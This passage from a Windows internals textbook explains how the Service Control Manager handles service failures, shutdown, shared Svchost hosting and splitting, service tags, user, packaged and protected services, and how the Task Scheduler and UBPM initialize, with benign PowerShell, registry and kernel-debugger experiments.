value under HKLM\SYSTEM\Control or the addition of a service or device
driver, causes the subsequent boot to fail. Figure 10-20 shows the Startup
Settings of the modern boot menu. Indeed, when the Last Known Good
feature is enabled, and the system is in the boot process, users can select the
Startup Settings choice in the Troubleshoot section of the modern boot
menu (or in the Windows Recovery Environment) to bring up another menu
that lets them direct the boot to use the last known good control set. (In case
the system is still using the Legacy boot menu, users should press F8 to
enable the Advanced Boot Options.) As shown in the figure, when the
Enable Last Known Good Configuration option is selected, the system
boots by rolling the system’s registry configuration back to the way it was
the last time the system booted successfully. Chapter 12 describes in more
detail the use of the Modern boot menu, the Windows Recovery
Environment, and other recovery mechanisms for troubleshooting system
startup problems.
Figure 10-20 Enabling the last known good configuration.
Service failures
A service can have optional FailureActions and FailureCommand values in
its registry key that the SCM records during the service’s startup. The SCM
registers with the system so that the system signals the SCM when a service
process exits. When a service process terminates unexpectedly, the SCM
determines which services ran in the process and takes the recovery steps
specified by their failure-related registry values. Additionally, services are
not only limited to requesting failure actions during crashes or unexpected
service termination, since other problems, such as a memory leak, could also
result in service failure.
If a service enters the SERVICE_STOPPED state and the error code
returned to the SCM is not ERROR_SUCCESS, the SCM checks whether the
service has the FailureActionsOnNonCrashFailures flag set and performs the
same recovery as if the service had crashed. To use this functionality, the
service must be configured via the ChangeServiceConfig2 API or the system
administrator can use the Sc.exe utility with the Failureflag parameter to set
FailureActionsOnNonCrashFailures to 1. The default value being 0, the
SCM will continue to honor the same behavior as on earlier versions of
Windows for all other services.
Actions that a service can configure for the SCM include restarting the
service, running a program, and rebooting the computer. Furthermore, a
service can specify the failure actions that take place the first time the service
process fails, the second time, and subsequent times, and it can indicate a
delay period that the SCM waits before restarting the service if the service
asks to be restarted. You can easily manage the recovery actions for a service
using the Recovery tab of the service’s Properties dialog box in the Services
MMC snap-in, as shown in Figure 10-21.
Figure 10-21 Service Recovery options.
Note that in case the next failure action is to reboot the computer, the
SCM, after starting the service, marks the hosting process as critical by
invoking the NtSetInformationProcess native API with the
ProcessBreakOnTermination information class. A critical process, if
terminated unexpectedly, crashes the system with the
CRITICAL_PROCESS_DIED bugcheck (as already explained in Part 1,
Chapter 2, “System architecture.”
Service shutdown
When Winlogon calls the Windows ExitWindowsEx function,
ExitWindowsEx sends a message to Csrss, the Windows subsystem process,
to invoke Csrss’s shutdown routine. Csrss loops through the active processes
and notifies them that the system is shutting down. For every system process
except the SCM, Csrss waits up to the number of seconds specified in
milliseconds by HKCU\Control Panel\Desktop\WaitToKillTimeout (which
defaults to 5 seconds) for the process to exit before moving on to the next
process. When Csrss encounters the SCM process, it also notifies it that the
system is shutting down but employs a timeout specific to the SCM. Csrss
recognizes the SCM using the process ID Csrss saved when the SCM
registered with Csrss using the RegisterServicesProcess function during its
initialization. The SCM’s timeout differs from that of other processes because
Csrss knows that the SCM communicates with services that need to perform
cleanup when they shut down, so an administrator might need to tune only
the SCM’s timeout. The SCM’s timeout value in milliseconds resides in the
HKLM\SYSTEM\CurrentControlSet\Control\WaitToKillServiceTimeout
registry value, and it defaults to 20 seconds.
The SCM’s shutdown handler is responsible for sending shutdown
notifications to all the services that requested shutdown notification when
they initialized with the SCM. The SCM function ScShutdownAllServices
first queries the value of the
HKLM\SYSTEM\CurrentControlSet\Control\ShutdownTimeout (by setting a
default of 20 seconds in case the value does not exists). It then loops through
the SCM services database. For each service, it unregisters eventual service
triggers and determines whether the service desires to receive a shutdown
notification, sending a shutdown command
(SERVICE_CONTROL_SHUTDOWN) if that is the case. Note that all the
notifications are sent to services in parallel by using thread pool work
threads. For each service to which it sends a shutdown command, the SCM
records the value of the service’s wait hint, a value that a service also
specifies when it registers with the SCM. The SCM keeps track of the largest
wait hint it receives (in case the maximum calculated wait hint is below the
Shutdown timeout specified by the ShutdownTimeout registry value, the
shutdown timeout is considered as maximum wait hint). After sending the
shutdown messages, the SCM waits either until all the services it notified of
shutdown exit or until the time specified by the largest wait hint passes.
While the SCM is busy telling services to shut down and waiting for them
to exit, Csrss waits for the SCM to exit. If the wait hint expires without all
services exiting, the SCM exits, and Csrss continues the shutdown process. In
case Csrss’s wait ends without the SCM having exited (the
WaitToKillServiceTimeout time expired), Csrss kills the SCM and continues
the shutdown process. Thus, services that fail to shut down in a timely
manner are killed. This logic lets the system shut down with the presence of
services that never complete a shutdown as a result of flawed design, but it
also means that services that require more than 5 seconds will not complete
their shutdown operations.
Additionally, because the shutdown order is not deterministic, services that
might depend on other services to shut down first (called shutdown
dependencies) have no way to report this to the SCM and might never have
the chance to clean up either.
To address these needs, Windows implements preshutdown notifications
and shutdown ordering to combat the problems caused by these two
scenarios. A preshutdown notification is sent to a service that has requested it
via the SetServiceStatus API (through the
SERVICE_ACCEPT_PRESHUTDOWN accepted control) using the same
mechanism as shutdown notifications. Preshutdown notifications are sent
before Wininit exits. The SCM generally waits for them to be acknowledged.
The idea behind these notifications is to flag services that might take a
long time to clean up (such as database server services) and give them more
time to complete their work. The SCM sends a progress query request and
waits 10 seconds for a service to respond to this notification. If the service
does not respond within this time, it is killed during the shutdown procedure;
otherwise, it can keep running as long as it needs, as long as it continues to
respond to the SCM.
Services that participate in the preshutdown can also specify a shutdown
order with respect to other preshutdown services. Services that depend on
other services to shut down first (for example, the Group Policy service
needs to wait for Windows Update to finish) can specify their shutdown
dependencies in the
HKLM\SYSTEM\CurrentControlSet\Control\PreshutdownOrder registry
value.
Shared service processes
Running every service in its own process instead of having services share a
process whenever possible wastes system resources. However, sharing
processes means that if any of the services in the process has a bug that
causes the process to exit, all the services in that process terminate.
Of the Windows built-in services, some run in their own process and some
share a process with other services. For example, the LSASS process
contains security-related services—such as the Security Accounts Manager
(SamSs) service, the Net Logon (Netlogon) service, the Encrypting File
System (EFS) service, and the Crypto Next Generation (CNG) Key Isolation
(KeyIso) service.
There is also a generic process named Service Host (SvcHost -
%SystemRoot%\System32\Svchost.exe) to contain multiple services.
Multiple instances of SvcHost run as different processes. Services that run in
SvcHost processes include Telephony (TapiSrv), Remote Procedure Call
(RpcSs), and Remote Access Connection Manager (RasMan). Windows
implements services that run in SvcHost as DLLs and includes an ImagePath
definition of the form %SystemRoot%\System32\svchost.exe –k netsvcs in
the service’s registry key. The service’s registry key must also have a registry
value named ServiceDll under a Parameters subkey that points to the
service’s DLL file.
All services that share a common SvcHost process specify the same
parameter (–k netsvcs in the example in the preceding paragraph) so that
they have a single entry in the SCM’s image database. When the SCM
encounters the first service that has a SvcHost ImagePath with a particular
parameter during service startup, it creates a new image database entry and
launches a SvcHost process with the parameter. The parameter specified with
the -k switch is the name of the service group. The entire command line is
parsed by the SCM while creating the new shared hosting process. As
discussed in the “Service logon” section, in case another service in the
database shares the same ImagePath value, its service SID will be added to
the new hosting process’s group SIDs list.
The new SvcHost process takes the service group specified in the
command line and looks for a value having the same name under
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost.
SvcHost reads the contents of the value, interpreting it as a list of service
names, and notifies the SCM that it’s hosting those services when SvcHost
registers with the SCM.
When the SCM encounters another shared service (by checking the service
type value) during service startup with an ImagePath matching an entry it
already has in the image database, it doesn’t launch a second process but
instead just sends a start command for the service to the SvcHost it already
started for that ImagePath value. The existing SvcHost process reads the
ServiceDll parameter in the service’s registry key, enables the new service
group SID in its token, and loads the DLL into its process to start the service.
Table 10-12 lists all the default service groupings on Windows and some
of the services that are registered for each of them.
Table 10-12 Major service groupings
Se
rvi
ce
Gr
ou
p
Services
Notes
Lo
cal
Ser
vic
e
Network Store Interface, Windows
Diagnostic Host, Windows Time, COM+
Event System, HTTP Auto-Proxy Service,
Software Protection Platform UI
Notification, Thread Order Service, LLDT
Discovery, SSL, FDP Host, WebClient
Services that run in
the local service
account and make
use of the network
on various ports or
have no network
usage at all (and
hence no
restrictions).
Lo
cal
Ser
UPnP and SSDP, Smart Card, TPM, Font
Cache, Function Discovery, AppID,
qWAVE, Windows Connect Now, Media
Services that run in
the local service
account and make
vic
eA
nd
No
Im
per
so
nat
ion
Center Extender, Adaptive Brightness
use of the network
on a fixed set of
ports. Services run
with a write-
restricted token.
Lo
cal
Ser
vic
eN
et
wo
rk
Re
stri
cte
d
DHCP, Event Logger, Windows Audio,
NetBIOS, Security Center, Parental
Controls, HomeGroup Provider
Services that run in
the local service
account and make
use of the network
on a fixed set of
ports.
Lo
cal
Ser
vic
eN
oN
et
wo
rk
Diagnostic Policy Engine, Base Filtering
Engine, Performance Logging and Alerts,
Windows Firewall, WWAN AutoConfig
Services that run in
the local service
account but make
no use of the
network at all.
Services run with a
write-restricted
token.
Lo
cal
Sy
DWM, WDI System Host, Network
Connections, Distributed Link Tracking,
Windows Audio Endpoint, Wired/WLAN
Services that run in
the local system
account and make
ste
m
Ne
tw
ork
Re
stri
cte
d
AutoConfig, Pnp-X, HID Access, User-
Mode Driver Framework Service,
Superfetch, Portable Device Enumerator,
HomeGroup Listener, Tablet Input,
Program Compatibility, Offline Files
use of the network
on a fixed set of
ports.
Ne
tw
ork
Ser
vic
e
Cryptographic Services, DHCP Client,
Terminal Services, WorkStation, Network
Access Protection, NLA, DNS Client,
Telephony, Windows Event Collector,
WinRM
Services that run in
the network service
account and make
use of the network
on various ports (or
have no enforced
network
restrictions).
Ne
tw
ork
Ser
vic
eA
nd
No
Im
per
so
nat
ion
KTM for DTC
Services that run in
the network service
account and make
use of the network
on a fixed set of
ports. Services run
with a write-
restricted token.
Ne
tw
ork
IPSec Policy Agent
Services that run in
the network service
account and make
Ser
vic
eN
et
wo
rk
Re
stri
cte
d
use of the network
on a fixed set of
ports.
Svchost service splitting
As discussed in the previous section, running a service in a shared host
process saves system resources but has the big drawback that a single
unhandled error in a service obliges all the other services shared in the host
process to be killed. To overcome this problem, Windows 10 Creators Update
(RS2) has introduced the Svchost Service splitting feature.
When the SCM starts, it reads three values from the registry representing
the services global commit limits (divided in: low, medium, and hard caps).
These values are used by the SCM to send “low resources” messages in case
the system runs under low-memory conditions. It then reads the Svchost
Service split threshold value from the
HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB
registry value. The value contains the minimum amount of system physical
memory (expressed in KB) needed to enable Svchost Service splitting (the
default value is 3.5 GB on client systems and around 3.7 GB on server
systems). The SCM then obtains the value of the total system physical
memory using the GlobalMemoryStatusEx API and compares it with the
threshold previously read from the registry. If the total physical memory is
above the threshold, it enables Svchost service splitting (by setting an
internal global variable).
Svchost service splitting, when active, modifies the behavior in which
SCM starts the host Svchost process of shared services. As already discussed
in the “Service start” section earlier in this chapter, the SCM does not search
for an existing image record in its database if service splitting is allowed for a
service. This means that, even though a service is marked as sharable, it is
started using its private hosting process (and its type is changed to
SERVICE_WIN32_OWN_PROCESS). Service splitting is allowed only if the
following conditions apply:
■ Svchost Service splitting is globally enabled.
■ The service is not marked as critical. A service is marked as critical if
its next recovery action specifies to reboot the machine (as discussed
previously in the “Service failures” section).
■ The service host process name is Svchost.exe.
■ Service splitting is not explicitly disabled for the service through the
SvcHostSplitDisable registry value in the service control key.
Memory manager’s technologies like Memory Compression and
Combining help in saving as much of the system working set as possible.
This explains one of the motivations behind the enablement of Svchost
service splitting. Even though many new processes are created in the system,
the memory manager assures that all the physical pages of the hosting
processes remain shared and consume as little system resources as possible.
Memory combining, compression, and memory sharing are explained in
detail in Chapter 5 of Part 1.
EXPERIMENT: Playing with Svchost service splitting
In case you are using a Windows 10 workstation equipped with 4
GB or more of memory, when you open the Task Manager, you
may notice that a lot of Svchost.exe process instances are currently
executing. As explained in this section, this doesn’t produce a
memory waste problem, but you could be interested in disabling
Svchost splitting. First, open Task Manager and count how many
svchost process instances are currently running in the system. On a
Windows 10 May 2019 Update (19H1) system, you should have
around 80 Svchost process instances. You can easily count them by
opening an administrative PowerShell window and typing the
following command:
Click here to view code image
(get-process -Name "svchost" | measure).Count
On the sample system, the preceding command returned 85.
Open the Registry Editor (by typing regedit.exe in the Cortana
search box) and navigate to the
HKLM\SYSTEM\CurrentControlSet\Control key. Note the current
value of the SvcHostSplitThresholdInKB DWORD value. To
globally disable Svchost service splitting, you should modify the
registry value by setting its data to 0. (You change it by double-
clicking the registry value and entering 0.) After modifying the
registry value, restart the system and repeat the previous step:
counting the number of Svchost process instances. The system now
runs with much fewer of them:
Click here to view code image
PS C:\> (get-process -Name "svchost" | measure).Count
26
To return to the previous behavior, you should restore the
previous content of the SvcHostSplitThresholdInKB registry value.
By modifying the DWORD value, you can also fine-tune the
amount of physical memory needed by Svchost splitting for
correctly being enabled.
Service tags
One of the disadvantages of using service-hosting processes is that
accounting for CPU time and usage, as well as for the usage of resources by a
specific service is much harder because each service is sharing the memory
address space, handle table, and per-process CPU accounting numbers with
the other services that are part of the same service group. Although there is
always a thread inside the service-hosting process that belongs to a certain
service, this association might not always be easy to make. For example, the
service might be using worker threads to perform its operation, or perhaps the
start address and stack of the thread do not reveal the service’s DLL name,
making it hard to figure out what kind of work a thread might be doing and to
which service it might belong.
Windows implements a service attribute called the service tag (not to be
confused with the driver tag), which the SCM generates by calling
ScGenerateServiceTag when a service is created or when the service
database is generated during system boot. The attribute is simply an index
identifying the service. The service tag is stored in the SubProcessTag field
of the thread environment block (TEB) of each thread (see Chapter 3 of Part
1 for more information on the TEB) and is propagated across all threads that
a main service thread creates (except threads created indirectly by thread-
pool APIs).
Although the service tag is kept internal to the SCM, several Windows
utilities, like Netstat.exe (a utility you can use for displaying which programs
have opened which ports on the network), use undocumented APIs to query
service tags and map them to service names. Another tool you can use to
look at service tags is ScTagQuery from Winsider Seminars & Solutions Inc.
(www.winsiderss.com/tools/sctagquery/sctagquery.htm). It can query the
SCM for the mappings of every service tag and display them either
systemwide or per-process. It can also show you to which services all the
threads inside a service-hosting process belong. (This is conditional on those
threads having a proper service tag associated with them.) This way, if you
have a runaway service consuming lots of CPU time, you can identify the
culprit service in case the thread start address or stack does not have an
obvious service DLL associated with it.
User services
As discussed in the “Running services in alternate accounts” section, a
service can be launched using the account of a local system user. A service
configured in that way is always loaded using the specified user account,
regardless of whether the user is currently logged on. This could represent a
limitation in multiuser environments, where a service should be executed
with the access token of the currently logged-on user. Furthermore, it can
expose the user account at risk because malicious users can potentially inject
into the service process and use its token to access resources they are not
supposed to (being able also to authenticate on the network).
Available from Windows 10 Creators Update (RS2), User Services allow a
service to run with the token of the currently logged-on user. User services
can be run in their own process or can share a process with one or more other
services running in the same logged-on user account as for standard services.
They are started when a user performs an interactive logon and stopped when
the user logs off. The SCM internally supports two additional type flags
—SERVICE_USER_SERVICE (64) and
SERVICE_USERSERVICE_INSTANCE (128)—which identify a user service
template and a user service instance.
One of the states of the Winlogon finite-state machine (see Chapter 12 for
details on Winlogon and the boot process) is executed when an interactive
logon has been initiated. The state creates the new user’s logon session,
window station, desktop, and environment; maps the
HKEY_CURRENT_USER registry hive; and notifies the logon subscribers
(LogonUI and User Manager). The User Manager service (Usermgr.dll)
through RPC is able to call into the SCM for delivering the
WTS_SESSION_LOGON session event.
The SCM processes the message through the
ScCreateUserServicesForUser function, which calls back into the User
Manager for obtaining the currently logged-on user’s token. It then queries
the list of user template services from the SCM database and, for each of
them, generates the new name of the user instance service.
EXPERIMENT: Witnessing user services
A kernel debugger can easily show the security attributes of a
process’s token. In this experiment, you need a Windows 10
machine with a kernel debugger enabled and attached to a host (a
local debugger works, too). In this experiment, you choose a user
service instance and analyze its hosting process’s token. Open the
Services tool by typing its name in the Cortana search box. The
application shows standard services and also user services instances
(even though it erroneously displays Local System as the user
account), which can be easily identified because they have a local
unique ID (LUID, generated by the User Manager) attached to their
displayed names. In the example, the Connected Device User
Service is displayed by the Services application as Connected
Device User Service_55d01:
If you double-click the identified service, the tool shows the
actual name of the user service instance (CDPUserSvc_55d01 in
the example). If the service is hosted in a shared process, like the
one chosen in the example, you should use the Registry Editor to
navigate in the service root key of the user service template, which
has the same name as the instance but without the LUID (the user
service template name is CDPUserSvc in the example). As
explained in the “Viewing privileges required by services”
experiment, under the Parameters subkey, the Service DLL name is
stored. The DLL name should be used in Process Explorer for
finding the correct hosting process ID (or you can simply use Task
Manager in the latest Windows 10 versions).
After you have found the PID of the hosting process, you should
break into the kernel debugger and type the following commands
(by replacing the <ServicePid> with the PID of the service’s
hosting process):
!process <ServicePid> 1
The debugger displays several pieces of information, including
the address of the associated security token object:
Click here to view code image
Kd: 0> !process 0n5936 1
Searching for Process with Cid == 1730
PROCESS ffffe10646205080
SessionId: 2 Cid: 1730 Peb: 81ebbd1000 ParentCid:
0344
DirBase: 8fe39002 ObjectTable: ffffa387c2826340
HandleCount: 313.
Image: svchost.exe
VadRoot ffffe1064629c340 Vads 108 Clone 0 Private 962.
Modified 214. Locked 0.
DeviceMap ffffa387be1341a0
Token ffffa387c2bdc060
ElapsedTime 00:35:29.441
...
<Output omitted for space reasons>
To show the security attributes of the token, you just need to use
the !token command followed by the address of the token object
(which internally is represented with a _TOKEN data structure)
returned by the previous command. You should easily confirm that
the process is hosting a user service by seeing the
WIN://ScmUserService security attribute, as shown in the
following output:
Click here to view code image
0: kd> !token ffffa387c2bdc060
_TOKEN 0xffffa387c2bdc060
TS Session ID: 0x2
User: S-1-5-21-725390342-1520761410-3673083892-1001
User Groups:
00 S-1-5-21-725390342-1520761410-3673083892-513
Attributes - Mandatory Default Enabled
... <Output omitted for space reason> ...
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0 Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
00 Claim Name : WIN://SCMUserService
Claim Flags: 0x40 - UNKNOWN
Value Type : CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 1
Value[0] : 0
01 Claim Name : TSA://ProcUnique
Claim Flags: 0x41 - UNKNOWN
Value Type : CLAIM_SECURITY_ATTRIBUTE_TYPE_UINT64
Value Count: 2
Value[0] : 102
Value[1] : 352550
Process Hacker, a system tool similar to Process Explorer and
available at https://processhacker.sourceforge.io/ is able to extract
the same information.
As discussed previously, the name of a user service instance is
generated by combining the original name of the service and a
local unique ID (LUID) generated by the User Manager for
identifying the user’s interactive session (internally called context
ID). The context ID for the interactive logon session is stored in the
volatile HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\VolatileUserMgrKey\ <Session
ID>\<User SID>\contextLuid registry value, where <Session ID>
and <User SID> identify the logon session ID and the user SID. If
you open the Registry Editor and navigate to this key, you will find
the same context ID value as the one used for generating the user
service instance name.
Figure 10-22 shows an example of a user service instance, the Clipboard
User Service, which is run using the token of the currently logged-on user.
The generated context ID for session 1 is 0x3a182, as shown by the User
Manager volatile registry key (see the previous experiment for details). The
SCM then calls ScCreateService, which creates a service record in the SCM
database. The new service record represents a new user service instance and
is saved in the registry as for normal services. The service security descriptor,
all the dependent services, and the triggers information are copied from the
user service template to the new user instance service.
Figure 10-22 The Clipboard User Service instance running in the context
ID 0x3a182.
The SCM registers the eventual service triggers (see the “Triggered-start
services” section earlier in this chapter for details) and then starts the service
(if its start type is set to SERVICE_AUTO_START). As discussed in the
“Service logon” section, when SCM starts a process hosting a user service, it
assigns the token of the current logged-on user and the
WIN://ScmUserService security attribute used by the SCM to recognize that
the process is really hosting a service. Figure 10-23 shows that, after a user
has logged in to the system, both the instance and template subkeys are
stored in the root services key representing the same user service. The
instance subkey is deleted on user logoff and ignored if it’s still present at
system startup time.
Figure 10-23 User service instance and template registry keys.
Packaged services
As briefly introduced in the “Service logon” section, since Windows 10
Anniversary Update (RS1), the Service Control Manager has supported
packaged services. A packaged service is identified through the
SERVICE_PKG_SERVICE (512) flag set in its service type. Packaged
services have been designed mainly to support standard Win32 desktop
applications (which may run with an associated service) converted to the new
Modern Application Model. The Desktop App Converter is indeed able to
convert a Win32 application to a Centennial app, which runs in a lightweight
container, internally called Helium. More details on the Modern Application
Model are available in the “Packaged application” section of Chapter 8.
When starting a packaged service, the SCM reads the package information
from the registry, and, as for standard Centennial applications, calls into the
AppInfo service. The latter verifies that the package information exists in the
state repository and the integrity of all the application package files. It then
stamps the new service’s host process token with the correct security
attributes. The process is then launched in a suspended state using
CreateProcessAsUser API (including the Package Full Name attribute) and a
Helium container is created, which will apply registry redirection and Virtual
File System (VFS) as for regular Centennial applications.
Protected services
Chapter 3 of Part 1 described in detail the architecture of protected processes
and protected processes light (PPL). The Windows 8.1 Service Control
Manager supports protected services. At the time of this writing, a service
can have four levels of protection: Windows, Windows light, Antimalware
light, and App. A service control program can specify the protection of a
service using the ChangeServiceConfig2 API (with the
SERVICE_CONFIG_LAUNCH_ PROTECTED information level). A
service’s main executable (or library in the case of shared services) must be
signed properly for running as a protected service, following the same rules
as for protected processes (which means that the system checks the digital
signature’s EKU and root certificate and generates a maximum signer level,
as explained in Chapter 3 of Part 1).
A service’s hosting process launched as protected guarantees a certain kind
of protection with respect to other nonprotected processes. They can’t
acquire some access rights while trying to access a protected service’s
hosting process, depending on the protection level. (The mechanism is
identical to standard protected processes. A classic example is a nonprotected
process not being able to inject any kind of code in a protected service.)
Even processes launched under the SYSTEM account can’t access a
protected process. However, the SCM should be fully able to access a
protected service’s hosting process. So, Wininit.exe launches the SCM by
specifying the maximum user-mode protection level: WinTcb Light. Figure
10-24 shows the digital signature of the SCM main executable, services.exe,
which includes the Windows TCB Component EKU
(1.3.6.1.4.1.311.10.3.23).
Figure 10-24 The Service Control Manager main executable (service.exe)
digital certificate.
The second part of protection is brought by the Service Control Manager.
While a client requests an action to be performed on a protected service, the
SCM calls the ScCheckServiceProtectedProcess routine with the goal to
check whether the caller has enough access rights to perform the requested
action on the service. Table 10-13 lists the denied operations when requested
by a nonprotected process on a protected service.
Table 10-13 List of denied operations while requested from nonprotected
client
Involve
d API
Name
Operation
Description
Change
Service
Config[
2]
Change
Service
Configuration
Any change of configuration to a protected
service is denied.
SetServi
ceObjec
tSecurit
y
Set a new
security
descriptor to a
service
Application of a new security descriptor to a
protected service is denied. (It could lower
the service attack surface.)
DeleteS
ervice
Delete a
Service
Nonprotected process can’t delete a
protected service.
Control
Service
Send a control
code to a
service
Only service-defined control code and
SERVICE_CONTROL_INTERROGATE are
allowed for nonprotected callers.
SERVICE_CONTROL_STOP is allowed for
any protection level except for
Antimalware.
The ScCheckServiceProtectedProcess function looks up the service record
from the caller-specified service handle and, in case the service is not
protected, always grants access. Otherwise, it impersonates the client process
token, obtains its process protection level, and implements the following
rules:
■ If the request is a STOP control request and the target service is not
protected at Antimalware level, grant the access (Antimalware
protected services are not stoppable by non-protected processes).
■ In case the TrustedInstaller service SID is present in the client’s token
groups or is set as the token user, the SCM grants access regarding the
client’s process protection.
■ Otherwise, it calls RtlTestProtectedAccess, which performs the same
checks implemented for protected processes. The access is granted
only if the client process has a compatible protection level with the
target service. For example, a Windows protected process can always
operate on all protected service levels, while an antimalware PPL can
only operate on Antimalware and app protected services.
Noteworthy is that the last check described is not executed for any client
process running with the TrustedInstaller virtual service account. This is by
design. When Windows Update installs an update, it should be able to start,
stop, and control any kind of service without requiring itself to be signed
with a strong digital signature (which could expose Windows Update to an
undesired attack surface).
Task scheduling and UBPM
Various Windows components have traditionally been in charge of managing
hosted or background tasks as the operating system has increased in
complexity in features, from the Service Control Manager, described earlier,
to the DCOM Server Launcher and the WMI Provider—all of which are also
responsible for the execution of out-of-process, hosted code. Although
modern versions of Windows use the Background Broker Infrastructure to
manage the majority of background tasks of modern applications (see
Chapter 8 for more details), the Task Scheduler is still the main component
that manages Win32 tasks. Windows implements a Unified Background
Process Manager (UBPM), which handles tasks managed by the Task
Scheduler.
The Task Scheduler service (Schedule) is implemented in the Schedsvc.dll
library and started in a shared Svchost process. The Task Scheduler service
maintains the tasks database and hosts UBPM, which starts and stops tasks
and manages their actions and triggers. UBPM uses the services provided by
the Desktop Activity Broker (DAB), the System Events Broker (SEB), and
the Resource Manager for receiving notification when tasks’ triggers are
generated. (DAB and SEB are both hosted in the System Events Broker
service, whereas Resource Manager is hosted in the Broker Infrastructure
service.) Both the Task Scheduler and UBPM provide public interfaces
exposed over RPC. External applications can use COM objects to attach to
those interfaces and interact with regular Win32 tasks.
The Task Scheduler
The Task Scheduler implements the task store, which provides storage for
each task. It also hosts the Scheduler idle service, which is able to detect
when the system enters or exits the idle state, and the Event trap provider,
which helps the Task Scheduler to launch a task upon a change in the
machine state and provides an internal event log triggering system. The Task
Scheduler also includes another component, the UBPM Proxy, which collects
all the tasks’ actions and triggers, converts their descriptors to a format that
UBPM can understand, and sends them to UBPM.
An overview of the Task Scheduler architecture is shown in Figure 10-25.
As highlighted by the picture, the Task Scheduler works deeply in
collaboration with UBPM (both components run in the Task Scheduler
service, which is hosted by a shared Svchost.exe process.) UBPM manages
the task’s states and receives notification from SEB, DAB, and Resource
Manager through WNF states.
Figure 10-25 The Task Scheduler architecture.
The Task Scheduler has the important job of exposing the server part of
the COM Task Scheduler APIs. When a Task Control program invokes one
of those APIs, the Task Scheduler COM API library (Taskschd.dll) is loaded
in the address space of the application by the COM engine. The library
requests services on behalf of the Task Control Program to the Task
Scheduler through RPC interfaces.
In a similar way, the Task Scheduler WMI provider (Schedprov.dll)
implements COM classes and methods able to communicate with the Task
Scheduler COM API library. Its WMI classes, properties, and events can be
called from Windows PowerShell through the ScheduledTasks cmdlet
(documented at https://docs.microsoft.com/en-
us/powershell/module/scheduledtasks/). Note that the Task Scheduler
includes a Compatibility plug-in, which allows legacy applications, like the
AT command, to work with the Task Scheduler. In the May 2019 Update
edition of Windows 10 (19H1), the AT tool has been declared deprecated,
and you should instead use schtasks.exe.
Initialization
When started by the Service Control Manager, the Task Scheduler service
begins its initialization procedure. It starts by registering its manifest-based
ETW event provider (that has the DE7B24EA-73C8-4A09-985D-
5BDADCFA9017 global unique ID). All the events generated by the Task
Scheduler are consumed by UBPM. It then initializes the Credential store,
which is a component used to securely access the user credentials stored by
the Credential Manager and the Task store. The latter checks that all the
XML task descriptors located in the Task store’s secondary shadow copy
(maintained for compatibility reasons and usually located in
%SystemRoot%\System32\Tasks path) are in sync with the task descriptors
located in the Task store cache. The Task store cache is represented by
multiple registry keys, with the root being
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache.
The next step in the Task Scheduler initialization is to initialize UBPM.
The Task Scheduler service uses the UbpmInitialize API exported from
UBPM.dll for starting the core components of UBPM. The function registers
an ETW consumer of the Task Scheduler’s event provider and connects to
the Resource Manager. The Resource Manager is a component loaded by the
Process State Manager (Psmsrv.dll, in the context of the Broker
Infrastructure service), which drives resource-wise policies based on the
machine state and global resource usage. Resource Manager helps UBPM to
manage maintenance tasks. Those types of tasks run only in particular system
states, like when the workstation CPU usage is low, when game mode is off,
the user is not physically present, and so on. UBPM initialization code then
retrieves the WNF state names representing the task’s conditions from the
System Event Broker: AC power, Idle Workstation, IP address or network
available, Workstation switching to Battery power. (Those conditions are
visible in the Conditions sheet of the Create Task dialog box of the Task
Scheduler MMC plug-in.)
UBPM initializes its internal thread pool worker threads, obtains system
power capabilities, reads a list of the maintenance and critical task actions
(from the HKLM\System\CurrentControlSet\Control\Ubpm registry key and
group policy settings) and subscribes to system power settings notifications
(in that way UBPM knows when the system changes its power state).
The execution control returns to the Task Scheduler, which finally
registers the global RPC interfaces of both itself and UBPM. Those interfaces
are used by the Task Scheduler API client-side DLL (Taskschd.dll) to
provide a way for client processes to interact via the Task Scheduler via the
Task Scheduler COM interfaces, which are documented at
https://docs.microsoft.com/en-us/windows/win32/api/taskschd/.
After the initialization is complete, the Task store enumerates all the tasks
that are installed in the system and starts each of them. Tasks are stored in the
cache in four groups: Boot, logon, plain, and Maintenance task. Each group
has an associated subkey, called Index Group Tasks key, located in the Task
store’s root registry key (HKLM\ SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache, as introduced previously). Inside
each Index Tasks group key is one subkey per each task, identified through a
global unique identifier (GUID). The Task Scheduler enumerates the names
of all the group’s subkeys, and, for each of them, opens the relative Task’s
master key, which is located in the Tasks subkey of the Task store’s root
registry key. Figure 10-26 shows a sample boot task, which has the
{0C7D8A27-9B28-49F1-979C-AD37C4D290B1} GUID. The task GUID is
listed in the figure as one of the first entries in the Boot index group key. The
figure also shows the master Task key, which stores binary data in the
registry to entirely describe the task.
Figure 10-26 A boot task master key.
The task’s master key contains all the information that describes the task.
Two properties of the task are the most important: Triggers, which describe
the conditions that will trigger the task, and Actions, which describe what
happen when the task is executed. Both properties are stored in binary
registry values (named “Triggers” and “Actions,”, as shown in Figure 10-26).
The Task Scheduler first reads the hash of the entire task descriptor (stored in
the Hash registry value); then it reads all the task’s configuration data and the
binary data for triggers and actions. After parsing this data, it adds each
identified trigger and action descriptor to an internal list.
The Task Scheduler then recalculates the SHA256 hash of the new task
descriptor (which includes all the data read from the registry) and compares it
with the expected value. If the two hashes do not match, the Task Scheduler
opens the XML file associated with the task contained in the store’s shadow
copy (the %SystemRoot%\System32\Tasks folder), parses its data and
recalculates a new hash, and finally replaces the task descriptor in the
registry. Indeed, tasks can be described by binary data included in the
registry and also by an XML file, which adhere to a well-defined schema,
documented at https://docs.microsoft.com/en-
us/windows/win32/taskschd/task-scheduler-schema.
EXPERIMENT: Explore a task’s XML descriptor
Task descriptors, as introduced in this section, are stored by the
Task store in two formats: XML file and in the registry. In this
experiment, you will peek at both formats. First, open the Task
Scheduler applet by typing taskschd.msc in the Cortana search
box. Expand the Task Scheduler Library node and all the subnodes
until you reach the Microsoft\Windows folder. Explore each
subnode and search for a task that has the Actions tab set to
Custom Handler. The action type is used for describing COM-
hosted tasks, which are not supported by the Task Scheduler applet.
In this example, we consider the ProcessMemoryDiagnosticEvents,
which can be found under the MemoryDiagnostics folder, but any
task with the Actions set to Custom Handler works well:
Open an administrative command prompt window (by typing
CMD in the Cortana search box and selecting Run As
Administrator); then type the following command (replacing the
